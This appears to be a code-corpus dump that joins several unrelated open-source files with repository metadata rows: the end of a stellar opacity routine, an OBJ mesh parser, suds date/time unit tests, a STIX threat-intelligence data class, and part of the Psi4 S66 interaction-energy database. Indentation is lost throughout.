cHemff[1] = cHemff[1] + signC1HemffTerm[i]*math.exp(thisLogTerm)
#//System.out.println("i " + i + " ii " + ii + " C1HemffTerm " + signC1HemffTerm[i]*Math.exp(logC1HemffTerm[i]));
thisLogTerm = ii*logTheta + logC2HemffTerm[i]
cHemff[2] = cHemff[2] + signC2HemffTerm[i]*math.exp(thisLogTerm)
#//System.out.println("i " + i + " ii " + ii + " C2HemffTerm " + signC2HemffTerm[i]*Math.exp(logC2HemffTerm[i]));
thisLogTerm = ii*logTheta + logC3HemffTerm[i]
cHemff[3] = cHemff[3] + signC3HemffTerm[i]*math.exp(thisLogTerm)
#//System.out.println("i " + i + " ii " + ii + " C3HemffTerm " + signC3HemffTerm[i]*Math.exp(logC3HemffTerm[i]));
#//// Should polynomial expansion for Cs be in log10Theta??: - No! Doesn't help
#// initialize accumulators:
#// cHemff[0] = C0HemffTerm[0];
#// cHemff[1] = C1HemffTerm[0];
#// cHemff[2] = C2HemffTerm[0];
#// cHemff[3] = C3HemffTerm[0];
#// ii = 0.0;
#// for (int i = 1; i < numHemffTerms; i++){
#// ii = (double) i;
#// log10ThetaFac = Math.pow(log10Theta, ii);
#// thisTerm = log10ThetaFac * C0HemffTerm[i];
#// cHemff[0] = cHemff[0] + thisTerm;
#// thisTerm = log10ThetaFac * C1HemffTerm[i];
#// cHemff[1] = cHemff[1] + thisTerm;
#// thisTerm = log10ThetaFac * C2HemffTerm[i];
#// cHemff[2] = cHemff[2] + thisTerm;
#// thisTerm = log10ThetaFac * C3HemffTerm[i];
#// cHemff[3] = cHemff[3] + thisTerm;
#// }
#//Build polynomial in logLambda for alpha(He^1_ff):
log10AlphaHemff = cHemff[0] #//initialize accumulation
#//System.out.println("cHemff[0] " + cHemff[0]);
ii = 0.0
for i in range(1, 3+1):
#//System.out.println("i " + i + " cHemff[i] " + cHemff[i]);
ii = float(i)
thisTerm = cHemff[i] * math.pow(log10LambdaA, ii)
log10AlphaHemff = log10AlphaHemff + thisTerm
#//System.out.println("log10AlphaHemff " + log10AlphaHemff);
alphaHemff = math.pow(10.0, log10AlphaHemff) #//gives infinite alphas!
#// alphaHemff = log10AlphaHemff; // ?????!!!!!
#//System.out.println("alphaHemff " + alphaHemff);
#// Note: this is the extinction coefficient per *Hydrogen* particle (NOT He- particle!)
# //nHe = Math.exp(logNHe1[iTau]) + Math.exp(logNHe2[iTau]);
# //logNHe = Math.log(nHe);
# //logKapHemff = Math.log(alphaHemff) + Math.log(AHe) + pe[1][iTau] + logNHe1[iTau] - logNHe;
logKapHemff = logAHemff + math.log(alphaHemff) + pe[1][iTau] + logNHe1[iTau] - logNH[iTau]
#//Stimulated emission already accounted for
#//Add it in to total - opacity per H particle, so multiply by logNH
#// This is now linear opacity in cm^-1
logKapHemff = logKapHemff + logNH[iTau]
kappa = kappa + math.exp(logKapHemff)
#//System.out.println("Hemff " + log10E*logKapHemff);
#//if (iTau == 36 && iLam == 155){
#//if (iLam == 155){
#// System.out.println("logKapHemff " + log10E*(logKapHemff)); //-rho[1][iTau]));
#//}
#//wavelength condition
#// temperature condition
#//
#// electron (e^-1) scattering (Thomson scattering)
#//coefficient per *"hydrogen atom"* (NOT per e^-!!) (neutral or total H??):
logKapE = logAlphaE + Ne[1][iTau] - logNH[iTau]
#//Stimulated emission not relevent
#//Add it in to total - opacity per H particle, so multiply by logNH
#// This is now linear opacity in cm^-1
#//I know, we're adding logNH right back in after subtracting it off, but this is for dlarity and consistency for now... :
logKapE = logKapE + logNH[iTau]
kappa = kappa + math.exp(logKapE)
#//System.out.println("E " + log10E*logKapE);
#//if (iTau == 36 && iLam == 142){
#// System.out.println("logKapE " + log10E*(logKapE)); //-rho[1][iTau]));
#//}
#//Metal b-f
#//Fig. 8.6 Gray 3rd Ed.
#//
#//
#// This is now linear opacity in cm^-1
#// Divide by mass density
#// This is now mass extinction in cm^2/g
#//
logKappa[iLam][iTau] = math.log(kappa) - rho[1][iTau]
#// Fudge is in cm^2/g: Converto to natural log:
logEKapFudge = logE10 * logKapFudge
logKappa[iLam][iTau] = logKappa[iLam][iTau] + logEKapFudge
#//if (iTau == 36 && iLam == 142){
#//System.out.println(" " + log10E*(logKappa[iLam][iTau]+rho[1][iTau]));
#//}
#// close iTau depth loop
#//
#//close iLam wavelength loop
return logKappa
#} //end method kappas2
def kapRos(numDeps, numLams, lambdas, logKappa, temp):
kappaRos = [ [0.0 for i in range(numDeps)] for j in range(2) ]
#double numerator, denominator, deltaLam, logdBdTau, logNumerator, logDenominator;
#double logTerm, logDeltaLam, logInvKap, logInvKapRos;
for iTau in range(numDeps):
numerator = 0.0 #//initialize accumulator
denominator = 0.0
for iLam in range(1, numLams):
deltaLam = lambdas[iLam] - lambdas[iLam-1] #//lambda in cm
logDeltaLam = math.log(deltaLam)
logInvKap = -1.0 * logKappa[iLam][iTau]
logdBdTau = Planck.dBdT(temp[0][iTau], lambdas[iLam])
logTerm = logdBdTau + logDeltaLam
denominator = denominator + math.exp(logTerm)
logTerm = logTerm + logInvKap;
numerator = numerator + math.exp(logTerm)
logNumerator = math.log(numerator)
logDenominator = math.log(denominator)
logInvKapRos = logNumerator - logDenominator
kappaRos[1][iTau] = -1.0 * logInvKapRos #//logarithmic
kappaRos[0][iTau] = math.exp(kappaRos[1][iTau])
return kappaRos
#} //end method kapRos
|
mit
| -5,651,264,113,527,596,000
| 39.857322
| 142
| 0.555948
| false
| 2.590395
| false
| false
| false
|
Aeva/silver
|
obj_parser.py
|
1
|
1318
|
# This file is part of Silver.
#
# Silver is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Silver is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with VoxelPress. If not, see <http://www.gnu.org/licenses/>.
#
# Have a nice day!
from model_tools import *
def obj_parser(fileob):
"""
Parser for wavefront obj files. File format reference:
http://en.wikipedia.org/wiki/Wavefront_.obj_file
"""
verts = []
vertbuffer = []
for line in fileob:
if line.strip()[0] == "v":
verts.append(str2vector(line))
if line.strip()[0] == "f":
params = line.strip().split(" ")[1:]
if line.count("/"):
params = [p.split("/")[0] for p in params]
params = map(lambda x:int(x)-1, params)
for i in params:
vertbuffer += verts[i]
return vertbuffer
|
gpl-3.0
| 7,802,623,028,144,939,000
| 27.652174
| 69
| 0.636571
| false
| 3.702247
| false
| false
| false
|
pexip/os-python-suds-jurko
|
tests/test_date_time.py
|
1
|
16814
|
# This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( jortel@redhat.com )
"""
Date & time related suds Python library unit tests.
Implemented using the 'pytest' testing framework.
"""
if __name__ == "__main__":
try:
import pytest
pytest.main(["--pyargs", __file__])
except ImportError:
print("'py.test' unit testing framework not available. Can not run "
"'{}' directly as a script.".format(__file__))
import sys
sys.exit(-2)
from suds.sax.date import (Date, DateTime, Time, UtcTimezone,
FixedOffsetTimezone)
from suds.xsd.sxbuiltin import XDate, XDateTime, XTime
import tests
import pytest
import datetime
tests.setup_logging()
class _Dummy:
"""Class for testing unknown object class handling."""
pass
"""Invalid date strings reused for both date & datetime testing."""
_invalid_date_strings = (
"",
"abla",
"12",
"12-01",
"-12-01",
"1900-01",
"+1900-10-01", # Plus sign not allowed.
"1900-13-01", # Invalid month.
"1900-02-30", # Invalid day.
"2001-02-29", # Not a leap year.
"2100-02-29", # Not a leap year.
" 1900-01-01",
"1900- 01-01",
"1900-01 -01",
"1900-01-01 ",
"1900-13-011",
"1900-01-01X",
"1900-01-01T", # 'T' is a date/time separator for DateTime.
# Invalid time zone indicators.
"1900-01-01 +17:00",
"1900-01-01+ 17:00",
"1900-01-01*17:00",
"1900-01-01 17:00",
"1900-01-01+17:",
"1900-01-01+170",
"1900-01-01+1730",
"1900-01-01+170:00",
"1900-01-01+17:00:00",
"1900-01-01-:4",
"1900-01-01-2a:00",
"1900-01-01-222:00",
"1900-01-01-12:000"
"1900-01-01+00:60",
"1900-01-01-00:99")
"""Invalid date strings reused for both time & datetime testing."""
_invalid_time_strings = (
"",
"bunga",
"12",
"::",
"12:",
"12:01",
"12:01:",
"12:01: 00",
"12:01: 00",
"23: 01:00",
" 23:01:00",
"23 :01:00",
"23::00",
"23:000:00",
"023:00:00",
"23:00:000",
"25:01:00",
"-1:01:00",
"24:01:00",
"23:-1:00",
"23:61:00",
"23:60:00",
"23:59:-1",
"23:59:61",
"23:59:60",
"7.59.13",
"7-59-13",
"-0:01:00",
"23:-0:00",
"23:59:-0",
"23:59:6.a",
"23:59:6.",
"23:59:6:0",
"23:59:6.12x",
"23:59:6.12x45",
"23:59:6.999999 ",
"23:59:6.999999x",
"T23:59:6",
# Invalid time zone indicators.
"13:27:04 -10:00",
"13:27:04- 10:00",
"13:27:04*17:00",
"13:27:04 17:00",
"13:27:04-003",
"13:27:04-003:00",
"13:27:04+00:002",
"13:27:04-13:60",
"13:27:04-121",
"13:27:04-1210",
"13:27:04-121:00",
"13:27:04+12:",
"13:27:04+12:00:00",
"13:27:04-:13"
"13:27:04-24:00"
"13:27:04+99:00")
class TestDate:
"""Tests for the suds.sax.date.Date class."""
def testConstructFromDate(self):
date = datetime.date(2001, 12, 10)
assert Date(date).value is date
def testConstructFromDateTime_naive(self):
date = datetime.datetime(2001, 12, 10, 10, 50, 21, 32132)
assert Date(date).value == datetime.date(2001, 12, 10)
@pytest.mark.parametrize("hours", (5, 20))
def testConstructFromDateTime_tzAware(self, hours):
tz = FixedOffsetTimezone(10)
date = datetime.datetime(2001, 12, 10, hours, 50, 21, 32132, tzinfo=tz)
assert Date(date).value == datetime.date(2001, 12, 10)
@pytest.mark.parametrize(("string", "y", "m", "d"), (
("1900-01-01", 1900, 1, 1),
("1900-1-1", 1900, 1, 1),
("1900-01-01z", 1900, 1, 1),
("1900-01-01Z", 1900, 1, 1),
("1900-01-01-02", 1900, 1, 1),
("1900-01-01+2", 1900, 1, 1),
("1900-01-01+02:00", 1900, 1, 1),
("1900-01-01+99:59", 1900, 1, 1),
("1900-01-01-21:13", 1900, 1, 1),
("2000-02-29", 2000, 2, 29))) # Leap year.
def testConstructFromString(self, string, y, m, d):
assert Date(string).value == datetime.date(y, m, d)
@pytest.mark.parametrize("string", _invalid_date_strings)
def testConstructFromString_failure(self, string):
pytest.raises(ValueError, Date, string)
@pytest.mark.parametrize("source", (
None,
object(),
_Dummy(),
datetime.time(10, 10)))
def testConstructFromUnknown(self, source):
pytest.raises(ValueError, Date, source)
@pytest.mark.parametrize(("input", "output"), (
("1900-01-01", "1900-01-01"),
("2000-02-29", "2000-02-29"),
("1900-1-1", "1900-01-01"),
("1900-01-01z", "1900-01-01"),
("1900-01-01Z", "1900-01-01"),
("1900-01-01-02", "1900-01-01"),
("1900-01-01+2", "1900-01-01"),
("1900-01-01+02:00", "1900-01-01"),
("1900-01-01+99:59", "1900-01-01"),
("1900-01-01-21:13", "1900-01-01")))
def testConvertToString(self, input, output):
assert str(Date(input)) == output
class TestDateTime:
"""Tests for the suds.sax.date.DateTime class."""
def testConstructFromDateTime(self):
dt = datetime.datetime(2001, 12, 10, 1, 1)
assert DateTime(dt).value is dt
dt.replace(tzinfo=UtcTimezone())
assert DateTime(dt).value is dt
@pytest.mark.parametrize(
("string", "y", "M", "d", "h", "m", "s", "micros"), (
("2013-11-19T14:05:23.428068", 2013, 11, 19, 14, 5, 23, 428068),
("2013-11-19 14:05:23.4280", 2013, 11, 19, 14, 5, 23, 428000)))
def testConstructFromString(self, string, y, M, d, h, m, s, micros):
assert DateTime(string).value == datetime.datetime(y, M, d, h, m, s,
micros)
@pytest.mark.parametrize("string",
[x + "T00:00:00" for x in _invalid_date_strings] +
["2000-12-31T" + x for x in _invalid_time_strings] + [
# Invalid date/time separator characters.
"2013-11-1914:05:23.428068",
"2013-11-19X14:05:23.428068"])
def testConstructFromString_failure(self, string):
pytest.raises(ValueError, DateTime, string)
@pytest.mark.parametrize(
("string", "y", "M", "d", "h", "m", "s", "micros"), (
("2000-2-28T23:59:59.9999995", 2000, 2, 29, 0, 0, 0, 0),
("2000-2-29T23:59:59.9999995", 2000, 3, 1, 0, 0, 0, 0),
("2013-12-31T23:59:59.9999994", 2013, 12, 31, 23, 59, 59, 999999),
("2013-12-31T23:59:59.99999949", 2013, 12, 31, 23, 59, 59, 999999),
("2013-12-31T23:59:59.9999995", 2014, 1, 1, 0, 0, 0, 0)))
def testConstructFromString_subsecondRounding(self, string, y, M, d, h, m,
s, micros):
ref = datetime.datetime(y, M, d, h, m, s, micros)
assert DateTime(string).value == ref
@pytest.mark.parametrize(
("string", "y", "M", "d", "h", "m", "s", "micros", "tz_h", "tz_m"), (
("2013-11-19T14:05:23.428068-3",
2013, 11, 19, 14, 5, 23, 428068, -3, 0),
("2013-11-19T14:05:23.068+03",
2013, 11, 19, 14, 5, 23, 68000, 3, 0),
("2013-11-19T14:05:23.428068-02:00",
2013, 11, 19, 14, 5, 23, 428068, -2, 0),
("2013-11-19T14:05:23.428068+02:00",
2013, 11, 19, 14, 5, 23, 428068, 2, 0),
("2013-11-19T14:05:23.428068-23:59",
2013, 11, 19, 14, 5, 23, 428068, -23, -59)))
def testConstructFromString_timezone(self, string, y, M, d, h, m, s,
micros, tz_h, tz_m):
tzdelta = datetime.timedelta(hours=tz_h, minutes=tz_m)
tzinfo = FixedOffsetTimezone(tzdelta)
ref = datetime.datetime(y, M, d, h, m, s, micros, tzinfo=tzinfo)
assert DateTime(string).value == ref
@pytest.mark.parametrize("source", (
None,
object(),
_Dummy(),
datetime.date(2010, 10, 27),
datetime.time(10, 10)))
def testConstructFromUnknown(self, source):
pytest.raises(ValueError, DateTime, source)
@pytest.mark.parametrize(("input", "output"), (
("2013-11-19T14:05:23.428068", "2013-11-19T14:05:23.428068"),
("2013-11-19 14:05:23.4280", "2013-11-19T14:05:23.428000"),
("2013-12-31T23:59:59.9999995", "2014-01-01T00:00:00"),
("2013-11-19T14:05:23.428068-3", "2013-11-19T14:05:23.428068-03:00"),
("2013-11-19T14:05:23.068+03", "2013-11-19T14:05:23.068000+03:00"),
("2013-11-19T14:05:23.4-02:00", "2013-11-19T14:05:23.400000-02:00"),
("2013-11-19T14:05:23.410+02:00", "2013-11-19T14:05:23.410000+02:00"),
("2013-11-19T14:05:23.428-23:59", "2013-11-19T14:05:23.428000-23:59")))
def testConvertToString(self, input, output):
assert str(DateTime(input)) == output
class TestTime:
"""Tests for the suds.sax.date.Time class."""
def testConstructFromTime(self):
time = datetime.time(1, 1)
assert Time(time).value is time
time.replace(tzinfo=UtcTimezone())
assert Time(time).value is time
@pytest.mark.parametrize(("string", "h", "m", "s", "micros"), (
("10:59:47", 10, 59, 47, 0),
("9:9:13", 9, 9, 13, 0),
("18:0:09.2139", 18, 0, 9, 213900),
("18:0:09.02139", 18, 0, 9, 21390),
("18:0:09.002139", 18, 0, 9, 2139),
("0:00:00.00013", 0, 0, 0, 130),
("0:00:00.000001", 0, 0, 0, 1),
("0:00:00.000000", 0, 0, 0, 0),
("23:59:6.999999", 23, 59, 6, 999999),
("1:13:50.0", 1, 13, 50, 0)))
def testConstructFromString(self, string, h, m, s, micros):
assert Time(string).value == datetime.time(h, m, s, micros)
@pytest.mark.parametrize("string", _invalid_time_strings)
def testConstructFromString_failure(self, string):
pytest.raises(ValueError, Time, string)
@pytest.mark.parametrize(("string", "h", "m", "s", "micros"), (
("0:0:0.0000000", 0, 0, 0, 0),
("0:0:0.0000001", 0, 0, 0, 0),
("0:0:0.0000004", 0, 0, 0, 0),
("0:0:0.0000005", 0, 0, 0, 1),
("0:0:0.0000006", 0, 0, 0, 1),
("0:0:0.0000009", 0, 0, 0, 1),
("0:0:0.5", 0, 0, 0, 500000),
("0:0:0.5000004", 0, 0, 0, 500000),
("0:0:0.5000005", 0, 0, 0, 500001),
("0:0:0.50000050", 0, 0, 0, 500001),
("0:0:0.50000051", 0, 0, 0, 500001),
("0:0:0.50000055", 0, 0, 0, 500001),
("0:0:0.50000059", 0, 0, 0, 500001),
("0:0:0.5000006", 0, 0, 0, 500001),
("0:0:0.9999990", 0, 0, 0, 999999),
("0:0:0.9999991", 0, 0, 0, 999999),
("0:0:0.9999994", 0, 0, 0, 999999),
("0:0:0.99999949", 0, 0, 0, 999999),
("0:0:0.9999995", 0, 0, 1, 0),
("0:0:0.9999996", 0, 0, 1, 0),
("0:0:0.9999999", 0, 0, 1, 0)))
def testConstructFromString_subsecondRounding(self, string, h, m, s,
micros):
assert Time(string).value == datetime.time(h, m, s, micros)
@pytest.mark.parametrize(
("string", "h", "m", "s", "micros", "tz_h", "tz_m"), (
("18:0:09.2139z", 18, 0, 9, 213900, 0, 0),
("18:0:09.2139Z", 18, 0, 9, 213900, 0, 0),
("18:0:09.2139+3", 18, 0, 9, 213900, 3, 0),
("18:0:09.2139-3", 18, 0, 9, 213900, -3, 0),
("18:0:09.2139-03", 18, 0, 9, 213900, -3, 0),
("18:0:09.2139+9:3", 18, 0, 9, 213900, 9, 3),
("18:0:09.2139+10:31", 18, 0, 9, 213900, 10, 31),
("18:0:09.2139-10:31", 18, 0, 9, 213900, -10, -31)))
def testConstructFromString_timezone(self, string, h, m, s, micros, tz_h,
tz_m):
tzdelta = datetime.timedelta(hours=tz_h, minutes=tz_m)
tzinfo = FixedOffsetTimezone(tzdelta)
ref = datetime.time(h, m, s, micros, tzinfo=tzinfo)
assert Time(string).value == ref
@pytest.mark.parametrize("source", (
None,
object(),
_Dummy(),
datetime.date(2010, 10, 27),
datetime.datetime(2010, 10, 27, 10, 10)))
def testConstructFromUnknown(self, source):
pytest.raises(ValueError, Time, source)
@pytest.mark.parametrize(("input", "output"), (
("14:05:23.428068", "14:05:23.428068"),
("14:05:23.4280", "14:05:23.428000"),
("23:59:59.9999995", "00:00:00"),
("14:05:23.428068-3", "14:05:23.428068-03:00"),
("14:05:23.068+03", "14:05:23.068000+03:00"),
("14:05:23.4-02:00", "14:05:23.400000-02:00"),
("14:05:23.410+02:00", "14:05:23.410000+02:00"),
("14:05:23.428-23:59", "14:05:23.428000-23:59")))
def testConvertToString(self, input, output):
assert str(Time(input)) == output
class TestXDate:
"""
Tests for the suds.xsd.sxbuiltin.XDate class.
Python object <--> string conversion details already tested in TestDate.
"""
def testTranslateEmptyStringToPythonObject(self):
assert XDate.translate("") == None
def testTranslateStringToPythonObject(self):
assert XDate.translate("1941-12-7") == datetime.date(1941, 12, 7)
def testTranslatePythonObjectToString(self):
date = datetime.date(2013, 7, 24)
translated = XDate.translate(date, topython=False)
assert isinstance(translated, str)
assert translated == "2013-07-24"
def testTranslatePythonObjectToString_datetime(self):
dt = datetime.datetime(2013, 7, 24, 11, 59, 4)
translated = XDate.translate(dt, topython=False)
assert isinstance(translated, str)
assert translated == "2013-07-24"
@pytest.mark.parametrize("source", (
None,
object(),
_Dummy(),
datetime.time()))
def testTranslatePythonObjectToString_failed(self, source):
assert XDate.translate(source, topython=False) is source
class TestXDateTime:
"""
Tests for the suds.xsd.sxbuiltin.XDateTime class.
Python object <--> string conversion details already tested in
TestDateTime.
"""
def testTranslateEmptyStringToPythonObject(self):
assert XDateTime.translate("") == None
def testTranslateStringToPythonObject(self):
dt = datetime.datetime(1941, 12, 7, 10, 30, 22, 454000)
assert XDateTime.translate("1941-12-7T10:30:22.454") == dt
def testTranslatePythonObjectToString(self):
dt = datetime.datetime(2021, 12, 31, 11, 25, tzinfo=UtcTimezone())
translated = XDateTime.translate(dt, topython=False)
assert isinstance(translated, str)
assert translated == "2021-12-31T11:25:00+00:00"
@pytest.mark.parametrize("source", (
None,
object(),
_Dummy(),
datetime.time(22, 47, 9, 981),
datetime.date(2101, 1, 1)))
def testTranslatePythonObjectToString_failed(self, source):
assert XDateTime.translate(source, topython=False) is source
class TestXTime:
"""
Tests for the suds.xsd.sxbuiltin.XTime class.
Python object <--> string conversion details already tested in
TestDateTime.
"""
def testTranslateEmptyStringToPythonObject(self):
assert XTime.translate("") == None
def testTranslateStringToPythonObject(self):
assert XTime.translate("10:30:22") == datetime.time(10, 30, 22)
def testTranslatePythonObjectToString(self):
time = datetime.time(16, 53, 12, tzinfo=FixedOffsetTimezone(4))
translated = XTime.translate(time, topython=False)
assert isinstance(translated, str)
assert translated == "16:53:12+04:00"
@pytest.mark.parametrize("source", (
None,
object(),
_Dummy(),
datetime.date(2101, 1, 1),
datetime.datetime(2101, 1, 1, 22, 47, 9, 981)))
def testTranslatePythonObjectToString_failed(self, source):
assert XTime.translate(source, topython=False) is source
|
lgpl-3.0
| 1,870,702,405,981,344,800
| 34.622881
| 79
| 0.555073
| false
| 2.976456
| true
| false
| false
|
STIXProject/python-stix
|
stix/ttp/infrastructure.py
|
1
|
3544
|
# Copyright (c) 2017, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
# mixbox
from mixbox import fields
# cybox
from cybox.core import Observables
# internal
import stix
from stix.common import StructuredTextList, VocabString
from stix.common.vocabs import AttackerInfrastructureType
import stix.bindings.ttp as ttp_binding
from mixbox import fields, entities
class Infrastructure(stix.Entity):
_binding = ttp_binding
_binding_class = _binding.InfrastructureType
_namespace = "http://stix.mitre.org/TTP-1"
id_ = fields.IdField("id")
idref = fields.IdrefField("idref")
title = fields.TypedField("Title")
descriptions = fields.TypedField("Description", StructuredTextList)
short_descriptions = fields.TypedField("Short_Description", StructuredTextList)
types = fields.TypedField("Type", VocabString, multiple=True, key_name="types")
observable_characterization = fields.TypedField("Observable_Characterization", Observables)
def __init__(self, id_=None, idref=None, title=None, description=None, short_description=None):
super(Infrastructure, self).__init__()
self.id_ = id_
self.idref = idref
self.title = title
self.description = StructuredTextList(description)
self.short_description = StructuredTextList(short_description)
@property
def description(self):
"""A single description about the contents or purpose of this object.
Default Value: ``None``
Note:
If this object has more than one description set, this will return
the description with the lowest ordinality value.
Returns:
An instance of :class:`.StructuredText`
"""
if self.descriptions is None:
self.descriptions = StructuredTextList()
return next(iter(self.descriptions), None)
@description.setter
def description(self, value):
self.descriptions = StructuredTextList(value)
def add_description(self, description):
"""Adds a description to the ``descriptions`` collection.
This is the same as calling "foo.descriptions.add(bar)".
"""
self.descriptions.add(description)
@property
def short_description(self):
"""A single short description about the contents or purpose of this
object.
Default Value: ``None``
Note:
If this object has more than one short description set, this will
return the description with the lowest ordinality value.
Returns:
An instance of :class:`.StructuredText`
"""
if self.short_descriptions is None:
self.short_descriptions = StructuredTextList()
return next(iter(self.short_descriptions), None)
@short_description.setter
def short_description(self, value):
self.short_descriptions = value
def add_short_description(self, description):
"""Adds a description to the ``short_descriptions`` collection.
This is the same as calling "foo.short_descriptions.add(bar)".
"""
self.short_descriptions.add(description)
def add_type(self, type_):
self.types.append(type_)
class InfraStructureTypes(stix.EntityList):
_namespace = "http://stix.mitre.org/TTP-1"
_contained_type = VocabString
@classmethod
def _dict_as_list(cls):
return True
def _fix_value(self, value):
return AttackerInfrastructureType(value)
|
bsd-3-clause
| -5,174,635,102,382,686,000
| 30.927928
| 99
| 0.670429
| false
| 4.189125
| false
| false
| false
|
amjames/psi4
|
psi4/share/psi4/databases/S66.py
|
1
|
148397
|
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2018 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This file is part of Psi4.
#
# Psi4 is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, version 3.
#
# Psi4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Psi4; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""
| Database (Hobza) of interaction energies for bimolecular complexes.
| Geometries and reference energies from Rezac et al. JCTC 7 2427 (2011).
- **cp** ``'off'`` || ``'on'``
- **rlxd** ``'off'``
- **subset**
- ``'small'``
- ``'large'``
- ``'HB'`` hydrogen-bonded systems
- ``'MX'`` mixed-influence systems
- ``'DD'`` dispersion-dominated systems
"""
import re
import qcdb
# <<< S66 Database Module >>>
dbse = 'S66'
# <<< Database Members >>>
HRXN = range(1, 67)
HRXN_SM = [1, 12, 59]
HRXN_LG = [26, 34]
HB = range(1, 24)
MX = range(47, 67)
DD = range(24, 47)
# <<< Chemical Systems Involved >>>
RXNM = {} # reaction matrix of reagent contributions per reaction
ACTV = {} # order of active reagents per reaction
ACTV_CP = {} # order of active reagents per counterpoise-corrected reaction
ACTV_SA = {} # order of active reagents for non-supermolecular calculations
for rxn in HRXN:
RXNM[ '%s-%s' % (dbse, rxn)] = {'%s-%s-dimer' % (dbse, rxn) : +1,
'%s-%s-monoA-CP' % (dbse, rxn) : -1,
'%s-%s-monoB-CP' % (dbse, rxn) : -1,
'%s-%s-monoA-unCP' % (dbse, rxn) : -1,
'%s-%s-monoB-unCP' % (dbse, rxn) : -1 }
ACTV_SA['%s-%s' % (dbse, rxn)] = ['%s-%s-dimer' % (dbse, rxn) ]
ACTV_CP['%s-%s' % (dbse, rxn)] = ['%s-%s-dimer' % (dbse, rxn),
'%s-%s-monoA-CP' % (dbse, rxn),
'%s-%s-monoB-CP' % (dbse, rxn) ]
ACTV[ '%s-%s' % (dbse, rxn)] = ['%s-%s-dimer' % (dbse, rxn),
'%s-%s-monoA-unCP' % (dbse, rxn),
'%s-%s-monoB-unCP' % (dbse, rxn) ]
# <<< Reference Values [kcal/mol] >>>
BIND = {}
BIND['%s-%s' % (dbse, '1' )] = -4.918
BIND['%s-%s' % (dbse, '2' )] = -5.592
BIND['%s-%s' % (dbse, '3' )] = -6.908
BIND['%s-%s' % (dbse, '4' )] = -8.103
BIND['%s-%s' % (dbse, '5' )] = -5.757
BIND['%s-%s' % (dbse, '6' )] = -7.554
BIND['%s-%s' % (dbse, '7' )] = -8.230
BIND['%s-%s' % (dbse, '8' )] = -5.009
BIND['%s-%s' % (dbse, '9' )] = -3.059
BIND['%s-%s' % (dbse, '10' )] = -4.160
BIND['%s-%s' % (dbse, '11' )] = -5.419
BIND['%s-%s' % (dbse, '12' )] = -7.266
BIND['%s-%s' % (dbse, '13' )] = -6.187
BIND['%s-%s' % (dbse, '14' )] = -7.454
BIND['%s-%s' % (dbse, '15' )] = -8.630
BIND['%s-%s' % (dbse, '16' )] = -5.124
BIND['%s-%s' % (dbse, '17' )] = -17.182
BIND['%s-%s' % (dbse, '18' )] = -6.857
BIND['%s-%s' % (dbse, '19' )] = -7.410
BIND['%s-%s' % (dbse, '20' )] = -19.093
BIND['%s-%s' % (dbse, '21' )] = -16.265
BIND['%s-%s' % (dbse, '22' )] = -19.491
BIND['%s-%s' % (dbse, '23' )] = -19.189
BIND['%s-%s' % (dbse, '24' )] = -2.822
BIND['%s-%s' % (dbse, '25' )] = -3.895
BIND['%s-%s' % (dbse, '26' )] = -9.829
BIND['%s-%s' % (dbse, '27' )] = -3.439
BIND['%s-%s' % (dbse, '28' )] = -5.713
BIND['%s-%s' % (dbse, '29' )] = -6.819
BIND['%s-%s' % (dbse, '30' )] = -1.432
BIND['%s-%s' % (dbse, '31' )] = -3.380
BIND['%s-%s' % (dbse, '32' )] = -3.738
BIND['%s-%s' % (dbse, '33' )] = -1.872
BIND['%s-%s' % (dbse, '34' )] = -3.776
BIND['%s-%s' % (dbse, '35' )] = -2.613
BIND['%s-%s' % (dbse, '36' )] = -1.777
BIND['%s-%s' % (dbse, '37' )] = -2.404
BIND['%s-%s' % (dbse, '38' )] = -2.997
BIND['%s-%s' % (dbse, '39' )] = -3.575
BIND['%s-%s' % (dbse, '40' )] = -2.895
BIND['%s-%s' % (dbse, '41' )] = -4.848
BIND['%s-%s' % (dbse, '42' )] = -4.138
BIND['%s-%s' % (dbse, '43' )] = -3.712
BIND['%s-%s' % (dbse, '44' )] = -2.005
BIND['%s-%s' % (dbse, '45' )] = -1.748
BIND['%s-%s' % (dbse, '46' )] = -4.264
BIND['%s-%s' % (dbse, '47' )] = -2.876
BIND['%s-%s' % (dbse, '48' )] = -3.535
BIND['%s-%s' % (dbse, '49' )] = -3.331
BIND['%s-%s' % (dbse, '50' )] = -2.867
BIND['%s-%s' % (dbse, '51' )] = -1.524
BIND['%s-%s' % (dbse, '52' )] = -4.707
BIND['%s-%s' % (dbse, '53' )] = -4.361
BIND['%s-%s' % (dbse, '54' )] = -3.277
BIND['%s-%s' % (dbse, '55' )] = -4.188
BIND['%s-%s' % (dbse, '56' )] = -3.231
BIND['%s-%s' % (dbse, '57' )] = -5.282
BIND['%s-%s' % (dbse, '58' )] = -4.146
BIND['%s-%s' % (dbse, '59' )] = -2.850
BIND['%s-%s' % (dbse, '60' )] = -4.868
BIND['%s-%s' % (dbse, '61' )] = -2.912
BIND['%s-%s' % (dbse, '62' )] = -3.534
BIND['%s-%s' % (dbse, '63' )] = -3.801
